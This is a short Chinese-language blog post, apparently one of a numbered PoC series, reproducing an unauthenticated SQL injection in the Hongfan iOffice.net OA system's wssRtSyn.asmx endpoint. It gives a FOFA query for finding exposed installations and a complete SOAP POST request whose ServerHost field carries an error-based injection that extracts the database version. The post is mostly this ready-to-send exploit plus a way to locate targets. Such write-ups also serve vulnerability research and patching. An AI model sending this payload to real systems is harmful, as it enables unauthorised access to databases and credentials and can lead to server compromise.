Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

H3-2红帆-OA-SQL

#Pocs

H3-2红帆-OA-SQL

漏洞描述:

红帆iOffice.net, wssRtSyn.asmx 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

网站图片:

image-20240621135028005

网络测绘:

fofa语法:

FOFA:app=“红帆-ioffice”

漏洞复现:

payload:

POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Connection: Keep-alive

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
<soap:Header />
<soap:Body>
<tns:SubmitLogInfo>
<tns:data>qwe</tns:data>
<tns:ServerHost>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tns:ServerHost>
</tns:SubmitLogInfo>
</soap:Body>
</soap:Envelope>

效果图:
查询数据库版本

H3-3红帆-OA-SQL
H3-1红帆-OA-SQL

Comment